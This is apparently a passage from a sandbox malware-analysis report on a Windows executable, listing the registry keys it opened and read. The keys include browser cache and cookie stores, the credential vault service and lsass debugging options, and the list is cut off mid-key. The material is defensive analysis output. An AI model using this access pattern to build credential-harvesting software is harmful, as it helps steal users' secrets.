HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\iitalo.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\58ABFD2A HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_CURRENT_USER\ HKEY_CURRENT_USER\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\ipconfig.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index26 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger HKEY_CURRENT_USER\Software\Microsoft\GDIPlus\FontCachePath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\58ABFD2A HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_CURRENT_USER\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible 